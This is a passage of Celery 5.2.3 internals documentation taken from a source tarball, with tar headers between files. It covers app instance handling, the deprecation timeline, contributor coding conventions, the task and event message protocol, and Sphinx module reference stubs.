if the app instance is missing. .. code-block:: python from celery.app import app_or_default class SomeClass: def __init__(self, app=None): self.app = app_or_default(app) The problem with this approach is that there's a chance that the app instance is lost along the way, and everything seems to be working normally. Testing app instance leaks is hard. The environment variable :envvar:`CELERY_TRACE_APP` can be used, when this is enabled :func:`celery.app.app_or_default` will raise an exception whenever it has to go back to the default app instance. 
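Here's a brief, illustrative sketch of the ``app_or_default`` pattern described
above; the ``Dispatcher`` class is a made-up example, not part of Celery.

.. code-block:: python

    from celery import Celery
    from celery.app import app_or_default

    app = Celery('proj', broker='amqp://guest@localhost//')

    class Dispatcher:
        """Hypothetical app-dependent object following the pattern above."""

        def __init__(self, app=None):
            # Fall back to the default app only when no instance is given.
            self.app = app_or_default(app)

    explicit = Dispatcher(app=app)  # bound to this specific app instance
    implicit = Dispatcher()         # falls back to the default app; with
                                    # CELERY_TRACE_APP set this raises instead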
App Dependency Tree ------------------- * {``app``} * ``celery.loaders.base.BaseLoader`` * ``celery.backends.base.BaseBackend`` * {``app.TaskSet``} * ``celery.task.sets.TaskSet`` (``app.TaskSet``) * [``app.TaskSetResult``] * ``celery.result.TaskSetResult`` (``app.TaskSetResult``) * {``app.AsyncResult``} * ``celery.result.BaseAsyncResult`` / ``celery.result.AsyncResult`` * ``celery.bin.worker.WorkerCommand`` * ``celery.apps.worker.Worker`` * ``celery.worker.WorkerController`` * ``celery.worker.consumer.Consumer`` * ``celery.worker.request.Request`` * ``celery.events.EventDispatcher`` * ``celery.worker.control.ControlDispatch`` * ``celery.worker.control.registry.Panel`` * ``celery.pidbox.BroadcastPublisher`` * ``celery.pidbox.BroadcastConsumer`` * ``celery.beat.EmbeddedService`` * ``celery.bin.events.EvCommand`` * ``celery.events.snapshot.evcam`` * ``celery.events.snapshot.Polaroid`` * ``celery.events.EventReceiver`` * ``celery.events.cursesmon.evtop`` * ``celery.events.EventReceiver`` * ``celery.events.cursesmon.CursesMonitor`` * ``celery.events.dumper`` * ``celery.events.EventReceiver`` * ``celery.bin.amqp.AMQPAdmin`` * ``celery.bin.beat.BeatCommand`` * ``celery.apps.beat.Beat`` * ``celery.beat.Service`` * ``celery.beat.Scheduler`` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/deprecation.rst0000664000175000017500000001310000000000000020646 0ustar00asifasif00000000000000.. _deprecation-timeline: ============================== Celery Deprecation Time-line ============================== .. contents:: :local: .. _deprecations-v5.0: Removals for version 5.0 ======================== Old Task API ------------ .. _deprecate-compat-task-modules: Compat Task Modules ~~~~~~~~~~~~~~~~~~~ - Module ``celery.decorators`` will be removed: This means you need to change: .. code-block:: python from celery.decorators import task Into: .. code-block:: python from celery import task - Module ``celery.task`` will be removed This means you should change: .. code-block:: python from celery.task import task into: .. code-block:: python from celery import shared_task -- and: .. code-block:: python from celery import task into: .. code-block:: python from celery import shared_task -- and: .. code-block:: python from celery.task import Task into: .. code-block:: python from celery import Task Note that the new :class:`~celery.Task` class no longer uses :func:`classmethod` for these methods: - delay - apply_async - retry - apply - AsyncResult - subtask This also means that you can't call these methods directly on the class, but have to instantiate the task first: .. code-block:: pycon >>> MyTask.delay() # NO LONGER WORKS >>> MyTask().delay() # WORKS! Task attributes --------------- The task attributes: - ``queue`` - ``exchange`` - ``exchange_type`` - ``routing_key`` - ``delivery_mode`` - ``priority`` is deprecated and must be set by :setting:`task_routes` instead. Modules to Remove ----------------- - ``celery.execute`` This module only contains ``send_task``: this must be replaced with :attr:`@send_task` instead. - ``celery.decorators`` See :ref:`deprecate-compat-task-modules` - ``celery.log`` Use :attr:`@log` instead. - ``celery.messaging`` Use :attr:`@amqp` instead. - ``celery.registry`` Use :mod:`celery.app.registry` instead. - ``celery.task.control`` Use :attr:`@control` instead. - ``celery.task.schedules`` Use :mod:`celery.schedules` instead. - ``celery.task.chords`` Use :func:`celery.chord` instead. 
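As a concrete illustration of the ``celery.execute`` removal above,
``send_task`` is replaced by the method on the app instance; the broker URL
and task name here are placeholders.

.. code-block:: python

    from celery import Celery

    app = Celery('proj', broker='amqp://guest@localhost//')

    # Previously: from celery.execute import send_task
    # Now: call send_task on the app itself, by task name.
    result = app.send_task('proj.tasks.add', args=(2, 2))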
Settings -------- ``BROKER`` Settings ~~~~~~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``BROKER_HOST`` :setting:`broker_url` ``BROKER_PORT`` :setting:`broker_url` ``BROKER_USER`` :setting:`broker_url` ``BROKER_PASSWORD`` :setting:`broker_url` ``BROKER_VHOST`` :setting:`broker_url` ===================================== ===================================== ``REDIS`` Result Backend Settings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERY_REDIS_HOST`` :setting:`result_backend` ``CELERY_REDIS_PORT`` :setting:`result_backend` ``CELERY_REDIS_DB`` :setting:`result_backend` ``CELERY_REDIS_PASSWORD`` :setting:`result_backend` ``REDIS_HOST`` :setting:`result_backend` ``REDIS_PORT`` :setting:`result_backend` ``REDIS_DB`` :setting:`result_backend` ``REDIS_PASSWORD`` :setting:`result_backend` ===================================== ===================================== Task_sent signal ---------------- The :signal:`task_sent` signal will be removed in version 4.0. Please use the :signal:`before_task_publish` and :signal:`after_task_publish` signals instead. Result ------ Apply to: :class:`~celery.result.AsyncResult`, :class:`~celery.result.EagerResult`: - ``Result.wait()`` -> ``Result.get()`` - ``Result.task_id()`` -> ``Result.id`` - ``Result.status`` -> ``Result.state``. .. _deprecations-v3.1: Settings ~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERY_AMQP_TASK_RESULT_EXPIRES`` :setting:`result_expires` ===================================== ===================================== .. _deprecations-v2.0: Removals for version 2.0 ======================== * The following settings will be removed: ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== `CELERY_AMQP_CONSUMER_QUEUES` `task_queues` `CELERY_AMQP_CONSUMER_QUEUES` `task_queues` `CELERY_AMQP_EXCHANGE` `task_default_exchange` `CELERY_AMQP_EXCHANGE_TYPE` `task_default_exchange_type` `CELERY_AMQP_CONSUMER_ROUTING_KEY` `task_queues` `CELERY_AMQP_PUBLISHER_ROUTING_KEY` `task_default_routing_key` ===================================== ===================================== * :envvar:`CELERY_LOADER` definitions without class name. For example,, `celery.loaders.default`, needs to include the class name: `celery.loaders.default.Loader`. * :meth:`TaskSet.run`. Use :meth:`celery.task.base.TaskSet.apply_async` instead. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/guide.rst0000664000175000017500000002061200000000000017454 0ustar00asifasif00000000000000.. _internals-guide: ================================ Contributors Guide to the Code ================================ .. contents:: :local: Philosophy ========== The API>RCP Precedence Rule --------------------------- - The API is more important than Readability - Readability is more important than Convention - Convention is more important than Performance - …unless the code is a proven hot-spot. 
More important than anything else is the end-user API. Conventions must step aside, and any suffering is always alleviated if the end result is a better API. Conventions and Idioms Used =========================== Classes ------- Naming ~~~~~~ - Follows :pep:`8`. - Class names must be `CamelCase`. - but not if they're verbs, verbs shall be `lower_case`: .. code-block:: python # - test case for a class class TestMyClass(Case): # BAD pass class test_MyClass(Case): # GOOD pass # - test case for a function class TestMyFunction(Case): # BAD pass class test_my_function(Case): # GOOD pass # - "action" class (verb) class UpdateTwitterStatus: # BAD pass class update_twitter_status: # GOOD pass .. note:: Sometimes it makes sense to have a class mask as a function, and there's precedence for this in the Python standard library (e.g., :class:`~contextlib.contextmanager`). Celery examples include :class:`~celery.signature`, :class:`~celery.chord`, ``inspect``, :class:`~kombu.utils.functional.promise` and more.. - Factory functions and methods must be `CamelCase` (excluding verbs): .. code-block:: python class Celery: def consumer_factory(self): # BAD ... def Consumer(self): # GOOD ... Default values ~~~~~~~~~~~~~~ Class attributes serve as default values for the instance, as this means that they can be set by either instantiation or inheritance. **Example:** .. code-block:: python class Producer: active = True serializer = 'json' def __init__(self, serializer=None, active=None): self.serializer = serializer or self.serializer # must check for None when value can be false-y self.active = active if active is not None else self.active A subclass can change the default value: .. code-block:: python TaskProducer(Producer): serializer = 'pickle' and the value can be set at instantiation: .. code-block:: pycon >>> producer = TaskProducer(serializer='msgpack') Exceptions ~~~~~~~~~~ Custom exceptions raised by an objects methods and properties should be available as an attribute and documented in the method/property that throw. This way a user doesn't have to find out where to import the exception from, but rather use ``help(obj)`` and access the exception class from the instance directly. **Example**: .. code-block:: python class Empty(Exception): pass class Queue: Empty = Empty def get(self): """Get the next item from the queue. :raises Queue.Empty: if there are no more items left. """ try: return self.queue.popleft() except IndexError: raise self.Empty() Composites ~~~~~~~~~~ Similarly to exceptions, composite classes should be override-able by inheritance and/or instantiation. Common sense can be used when selecting what classes to include, but often it's better to add one too many: predicting what users need to override is hard (this has saved us from many a monkey patch). **Example**: .. code-block:: python class Worker: Consumer = Consumer def __init__(self, connection, consumer_cls=None): self.Consumer = consumer_cls or self.Consumer def do_work(self): with self.Consumer(self.connection) as consumer: self.connection.drain_events() Applications vs. "single mode" ============================== In the beginning Celery was developed for Django, simply because this enabled us get the project started quickly, while also having a large potential user base. In Django there's a global settings object, so multiple Django projects can't co-exist in the same process space, this later posed a problem for using Celery with frameworks that don't have this limitation. Therefore the app concept was introduced. 
When using apps you use 'celery' objects instead of importing things from Celery sub-modules, this (unfortunately) also means that Celery essentially has two API's. Here's an example using Celery in single-mode: .. code-block:: python from celery import task from celery.task.control import inspect from .models import CeleryStats @task def write_stats_to_db(): stats = inspect().stats(timeout=1) for node_name, reply in stats: CeleryStats.objects.update_stat(node_name, stats) and here's the same using Celery app objects: .. code-block:: python from .celery import celery from .models import CeleryStats @app.task def write_stats_to_db(): stats = celery.control.inspect().stats(timeout=1) for node_name, reply in stats: CeleryStats.objects.update_stat(node_name, stats) In the example above the actual application instance is imported from a module in the project, this module could look something like this: .. code-block:: python from celery import Celery app = Celery(broker='amqp://') Module Overview =============== - celery.app This is the core of Celery: the entry-point for all functionality. - celery.loaders Every app must have a loader. The loader decides how configuration is read; what happens when the worker starts; when a task starts and ends; and so on. The loaders included are: - app Custom Celery app instances uses this loader by default. - default "single-mode" uses this loader by default. Extension loaders also exist, for example :pypi:`celery-pylons`. - celery.worker This is the worker implementation. - celery.backends Task result backends live here. - celery.apps Major user applications: worker and beat. The command-line wrappers for these are in celery.bin (see below) - celery.bin Command-line applications. :file:`setup.py` creates setuptools entry-points for these. - celery.concurrency Execution pool implementations (prefork, eventlet, gevent, solo, thread). - celery.db Database models for the SQLAlchemy database result backend. (should be moved into :mod:`celery.backends.database`) - celery.events Sending and consuming monitoring events, also includes curses monitor, event dumper and utilities to work with in-memory cluster state. - celery.execute.trace How tasks are executed and traced by the worker, and in eager mode. - celery.security Security related functionality, currently a serializer using cryptographic digests. - celery.task single-mode interface to creating tasks, and controlling workers. - t.unit (int distribution) The unit test suite. - celery.utils Utility functions used by the Celery code base. Much of it is there to be compatible across Python versions. - celery.contrib Additional public code that doesn't fit into any other name-space. Worker overview =============== * `celery.bin.worker:Worker` This is the command-line interface to the worker. Responsibilities: * Daemonization when :option:`--detach ` set, * dropping privileges when using :option:`--uid `/ :option:`--gid ` arguments * Installs "concurrency patches" (eventlet/gevent monkey patches). ``app.worker_main(argv)`` calls ``instantiate('celery.bin.worker:Worker')(app).execute_from_commandline(argv)`` * `app.Worker` -> `celery.apps.worker:Worker` Responsibilities: * sets up logging and redirects standard outs * installs signal handlers (`TERM`/`HUP`/`STOP`/`USR1` (cry)/`USR2` (rdb)) * prints banner and warnings (e.g., pickle warning) * handles the :option:`celery worker --purge` argument * `app.WorkController` -> `celery.worker.WorkController` This is the real worker, built up around bootsteps. 
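To make the call chain above concrete, here is a minimal, illustrative way to
start a worker programmatically; the argv values are just an example.

.. code-block:: python

    from celery import Celery

    app = Celery('proj', broker='amqp://guest@localhost//')

    if __name__ == '__main__':
        # Roughly equivalent to: celery -A proj worker --loglevel=INFO
        # worker_main() goes through celery.bin.worker as described above.
        app.worker_main(argv=['worker', '--loglevel=INFO'])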
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/index.rst0000664000175000017500000000031600000000000017465 0ustar00asifasif00000000000000.. _internals: =========== Internals =========== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 guide deprecation worker protocol app-overview reference/index ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/protocol.rst0000664000175000017500000002325200000000000020223 0ustar00asifasif00000000000000.. _message-protocol: =================== Message Protocol =================== .. contents:: :local: .. _message-protocol-task: .. _internals-task-message-protocol: Task messages ============= .. _message-protocol-task-v2: Version 2 --------- Definition ~~~~~~~~~~ .. code-block:: python properties = { 'correlation_id': uuid task_id, 'content_type': string mimetype, 'content_encoding': string encoding, # optional 'reply_to': string queue_or_url, } headers = { 'lang': string 'py' 'task': string task, 'id': uuid task_id, 'root_id': uuid root_id, 'parent_id': uuid parent_id, 'group': uuid group_id, # optional 'meth': string method_name, 'shadow': string alias_name, 'eta': iso8601 ETA, 'expires': iso8601 expires, 'retries': int retries, 'timelimit': (soft, hard), 'argsrepr': str repr(args), 'kwargsrepr': str repr(kwargs), 'origin': str nodename, 'replaced_task_nesting': int } body = ( object[] args, Mapping kwargs, Mapping embed { 'callbacks': Signature[] callbacks, 'errbacks': Signature[] errbacks, 'chain': Signature[] chain, 'chord': Signature chord_callback, } ) Example ~~~~~~~ This example sends a task message using version 2 of the protocol: .. code-block:: python # chain: add(add(add(2, 2), 4), 8) == 2 + 2 + 4 + 8 import json import os import socket task_id = uuid() args = (2, 2) kwargs = {} basic_publish( message=json.dumps((args, kwargs, None)), application_headers={ 'lang': 'py', 'task': 'proj.tasks.add', 'argsrepr': repr(args), 'kwargsrepr': repr(kwargs), 'origin': '@'.join([os.getpid(), socket.gethostname()]) } properties={ 'correlation_id': task_id, 'content_type': 'application/json', 'content_encoding': 'utf-8', } ) Changes from version 1 ~~~~~~~~~~~~~~~~~~~~~~ - Protocol version detected by the presence of a ``task`` message header. - Support for multiple languages via the ``lang`` header. Worker may redirect the message to a worker that supports the language. - Meta-data moved to headers. This means that workers/intermediates can inspect the message and make decisions based on the headers without decoding the payload (that may be language specific, for example serialized by the Python specific pickle serializer). - Always UTC There's no ``utc`` flag anymore, so any time information missing timezone will be expected to be in UTC time. - Body is only for language specific data. - Python stores args/kwargs and embedded signatures in body. - If a message uses raw encoding then the raw data will be passed as a single argument to the function. - Java/C, etc. can use a Thrift/protobuf document as the body - ``origin`` is the name of the node sending the task. - Dispatches to actor based on ``task``, ``meth`` headers ``meth`` is unused by Python, but may be used in the future to specify class+method pairs. - Chain gains a dedicated field. Reducing the chain into a recursive ``callbacks`` argument causes problems when the recursion limit is exceeded. 
This is fixed in the new message protocol by specifying a list of signatures, each task will then pop a task off the list when sending the next message: .. code-block:: python execute_task(message) chain = embed['chain'] if chain: sig = maybe_signature(chain.pop()) sig.apply_async(chain=chain) - ``correlation_id`` replaces ``task_id`` field. - ``root_id`` and ``parent_id`` fields helps keep track of work-flows. - ``shadow`` lets you specify a different name for logs, monitors can be used for concepts like tasks that calls a function specified as argument: .. code-block:: python from celery.utils.imports import qualname class PickleTask(Task): def unpack_args(self, fun, args=()): return fun, args def apply_async(self, args, kwargs, **options): fun, real_args = self.unpack_args(*args) return super().apply_async( (fun, real_args, kwargs), shadow=qualname(fun), **options ) @app.task(base=PickleTask) def call(fun, args, kwargs): return fun(*args, **kwargs) .. _message-protocol-task-v1: .. _task-message-protocol-v1: Version 1 --------- In version 1 of the protocol all fields are stored in the message body: meaning workers and intermediate consumers must deserialize the payload to read the fields. Message body ~~~~~~~~~~~~ * ``task`` :`string`: Name of the task. **required** * ``id`` :`string`: Unique id of the task (UUID). **required** * ``args`` :`list`: List of arguments. Will be an empty list if not provided. * ``kwargs`` :`dictionary`: Dictionary of keyword arguments. Will be an empty dictionary if not provided. * ``retries`` :`int`: Current number of times this task has been retried. Defaults to `0` if not specified. * ``eta`` :`string` (ISO 8601): Estimated time of arrival. This is the date and time in ISO 8601 format. If not provided the message isn't scheduled, but will be executed asap. * ``expires`` :`string` (ISO 8601): .. versionadded:: 2.0.2 Expiration date. This is the date and time in ISO 8601 format. If not provided the message will never expire. The message will be expired when the message is received and the expiration date has been exceeded. * ``taskset`` :`string`: The group this task is part of (if any). * ``chord`` :`Signature`: .. versionadded:: 2.3 Signifies that this task is one of the header parts of a chord. The value of this key is the body of the cord that should be executed when all of the tasks in the header has returned. * ``utc`` :`bool`: .. versionadded:: 2.5 If true time uses the UTC timezone, if not the current local timezone should be used. * ``callbacks`` :`Signature`: .. versionadded:: 3.0 A list of signatures to call if the task exited successfully. * ``errbacks`` :`Signature`: .. versionadded:: 3.0 A list of signatures to call if an error occurs while executing the task. * ``timelimit`` :`(float, float)`: .. versionadded:: 3.1 Task execution time limit settings. This is a tuple of hard and soft time limit value (`int`/`float` or :const:`None` for no limit). Example value specifying a soft time limit of 3 seconds, and a hard time limit of 10 seconds:: {'timelimit': (3.0, 10.0)} Example message ~~~~~~~~~~~~~~~ This is an example invocation of a `celery.task.ping` task in json format: .. code-block:: javascript {"id": "4cc7438e-afd4-4f8f-a2f3-f46567e7ca77", "task": "celery.task.PingTask", "args": [], "kwargs": {}, "retries": 0, "eta": "2009-11-17T12:30:56.527191"} Task Serialization ------------------ Several types of serialization formats are supported using the `content_type` message header. 
The MIME-types supported by default are shown in the following table. =============== ================================= Scheme MIME Type =============== ================================= json application/json yaml application/x-yaml pickle application/x-python-serialize msgpack application/x-msgpack =============== ================================= .. _message-protocol-event: Event Messages ============== Event messages are always JSON serialized and can contain arbitrary message body fields. Since version 4.0. the body can consist of either a single mapping (one event), or a list of mappings (multiple events). There are also standard fields that must always be present in an event message: Standard body fields -------------------- - *string* ``type`` The type of event. This is a string containing the *category* and *action* separated by a dash delimiter (e.g., ``task-succeeded``). - *string* ``hostname`` The fully qualified hostname of where the event occurred at. - *unsigned long long* ``clock`` The logical clock value for this event (Lamport time-stamp). - *float* ``timestamp`` The UNIX time-stamp corresponding to the time of when the event occurred. - *signed short* ``utcoffset`` This field describes the timezone of the originating host, and is specified as the number of hours ahead of/behind UTC (e.g., -2 or +1). - *unsigned long long* ``pid`` The process id of the process the event originated in. Standard event types -------------------- For a list of standard event types and their fields see the :ref:`event-reference`. Example message --------------- This is the message fields for a ``task-succeeded`` event: .. code-block:: python properties = { 'routing_key': 'task.succeeded', 'exchange': 'celeryev', 'content_type': 'application/json', 'content_encoding': 'utf-8', 'delivery_mode': 1, } headers = { 'hostname': 'worker1@george.vandelay.com', } body = { 'type': 'task-succeeded', 'hostname': 'worker1@george.vandelay.com', 'pid': 6335, 'clock': 393912923921, 'timestamp': 1401717709.101747, 'utcoffset': -1, 'uuid': '9011d855-fdd1-4f8f-adb3-a413b499eafb', 'retval': '4', 'runtime': 0.0003212, ) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.655754 celery-5.2.3/docs/internals/reference/0000775000175000017500000000000000000000000017562 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery._state.rst0000664000175000017500000000034200000000000023054 0ustar00asifasif00000000000000======================================== ``celery._state`` ======================================== .. contents:: :local: .. currentmodule:: celery._state .. automodule:: celery._state :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.app.annotations.rst0000664000175000017500000000040100000000000024705 0ustar00asifasif00000000000000========================================== ``celery.app.annotations`` ========================================== .. contents:: :local: .. currentmodule:: celery.app.annotations .. 
automodule:: celery.app.annotations :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.app.routes.rst0000664000175000017500000000034000000000000023673 0ustar00asifasif00000000000000================================= ``celery.app.routes`` ================================= .. contents:: :local: .. currentmodule:: celery.app.routes .. automodule:: celery.app.routes :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.app.trace.rst0000664000175000017500000000035700000000000023460 0ustar00asifasif00000000000000========================================== ``celery.app.trace`` ========================================== .. contents:: :local: .. currentmodule:: celery.app.trace .. automodule:: celery.app.trace :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.arangodb.rst0000664000175000017500000000041300000000000025122 0ustar00asifasif00000000000000============================================ ``celery.backends.arangodb`` ============================================ .. contents:: :local: .. currentmodule:: celery.backends.arangodb .. automodule:: celery.backends.arangodb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.asynchronous.rst0000664000175000017500000000041300000000000026100 0ustar00asifasif00000000000000===================================== ``celery.backends.asynchronous`` ===================================== .. contents:: :local: .. currentmodule:: celery.backends.asynchronous .. automodule:: celery.backends.asynchronous :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.azureblockblob.rst0000664000175000017500000000044500000000000026352 0ustar00asifasif00000000000000================================================ ``celery.backends.azureblockblob`` ================================================ .. contents:: :local: .. currentmodule:: celery.backends.azureblockblob .. automodule:: celery.backends.azureblockblob :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.base.rst0000664000175000017500000000036300000000000024263 0ustar00asifasif00000000000000===================================== ``celery.backends.base`` ===================================== .. contents:: :local: .. currentmodule:: celery.backends.base .. automodule:: celery.backends.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.cache.rst0000664000175000017500000000040000000000000024404 0ustar00asifasif00000000000000=========================================== ``celery.backends.cache`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.cache .. 
automodule:: celery.backends.cache :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.cassandra.rst0000664000175000017500000000042600000000000025310 0ustar00asifasif00000000000000================================================ ``celery.backends.cassandra`` ================================================ .. contents:: :local: .. currentmodule:: celery.backends.cassandra .. automodule:: celery.backends.cassandra :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.consul.rst0000664000175000017500000000037500000000000024657 0ustar00asifasif00000000000000========================================== celery.backends.consul ========================================== .. contents:: :local: .. currentmodule:: celery.backends.consul .. automodule:: celery.backends.consul :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.cosmosdbsql.rst0000664000175000017500000000043400000000000025701 0ustar00asifasif00000000000000================================================ ``celery.backends.cosmosdbsql`` ================================================ .. contents:: :local: .. currentmodule:: celery.backends.cosmosdbsql .. automodule:: celery.backends.cosmosdbsql :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.couchbase.rst0000664000175000017500000000041600000000000025304 0ustar00asifasif00000000000000============================================ ``celery.backends.couchbase`` ============================================ .. contents:: :local: .. currentmodule:: celery.backends.couchbase .. automodule:: celery.backends.couchbase :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.couchdb.rst0000664000175000017500000000040600000000000024756 0ustar00asifasif00000000000000=========================================== ``celery.backends.couchdb`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.couchdb .. automodule:: celery.backends.couchdb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.database.models.rst0000664000175000017500000000042400000000000026375 0ustar00asifasif00000000000000====================================== ``celery.backends.database.models`` ====================================== .. contents:: :local: .. currentmodule:: celery.backends.database.models .. automodule:: celery.backends.database.models :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.database.rst0000664000175000017500000000044500000000000025116 0ustar00asifasif00000000000000========================================================= ``celery.backends.database`` ========================================================= .. contents:: :local: .. 
currentmodule:: celery.backends.database .. automodule:: celery.backends.database :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.database.session.rst0000664000175000017500000000043300000000000026575 0ustar00asifasif00000000000000======================================== ``celery.backends.database.session`` ======================================== .. contents:: :local: .. currentmodule:: celery.backends.database.session .. automodule:: celery.backends.database.session :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.dynamodb.rst0000664000175000017500000000041100000000000025140 0ustar00asifasif00000000000000=========================================== ``celery.backends.dynamodb`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.dynamodb .. automodule:: celery.backends.dynamodb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.elasticsearch.rst0000664000175000017500000000043000000000000026156 0ustar00asifasif00000000000000=========================================== ``celery.backends.elasticsearch`` =========================================== .. contents:: :local: .. currentmodule:: celery.backends.elasticsearch .. automodule:: celery.backends.elasticsearch :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.filesystem.rst0000664000175000017500000000041500000000000025533 0ustar00asifasif00000000000000========================================== ``celery.backends.filesystem`` ========================================== .. contents:: :local: .. currentmodule:: celery.backends.filesystem .. automodule:: celery.backends.filesystem :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.mongodb.rst0000664000175000017500000000041000000000000024767 0ustar00asifasif00000000000000============================================ ``celery.backends.mongodb`` ============================================ .. contents:: :local: .. currentmodule:: celery.backends.mongodb .. automodule:: celery.backends.mongodb :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.redis.rst0000664000175000017500000000037600000000000024463 0ustar00asifasif00000000000000========================================== ``celery.backends.redis`` ========================================== .. contents:: :local: .. currentmodule:: celery.backends.redis .. automodule:: celery.backends.redis :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.rpc.rst0000664000175000017500000000036200000000000024134 0ustar00asifasif00000000000000======================================= ``celery.backends.rpc`` ======================================= .. contents:: :local: .. 
currentmodule:: celery.backends.rpc .. automodule:: celery.backends.rpc :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.rst0000664000175000017500000000031600000000000023350 0ustar00asifasif00000000000000=========================== ``celery.backends`` =========================== .. contents:: :local: .. currentmodule:: celery.backends .. automodule:: celery.backends :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.backends.s3.rst0000664000175000017500000000036500000000000023700 0ustar00asifasif00000000000000========================================== ``celery.backends.s3`` ========================================== .. contents:: :local: .. currentmodule:: celery.backends.s3 .. automodule:: celery.backends.s3 :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.base.rst0000664000175000017500000000041600000000000025042 0ustar00asifasif00000000000000=============================================== ``celery.concurrency.base`` =============================================== .. contents:: :local: .. currentmodule:: celery.concurrency.base .. automodule:: celery.concurrency.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.eventlet.rst0000664000175000017500000000046600000000000025763 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.eventlet`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.eventlet .. automodule:: celery.concurrency.eventlet :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.gevent.rst0000664000175000017500000000046000000000000025417 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.gevent`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.gevent .. automodule:: celery.concurrency.gevent :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 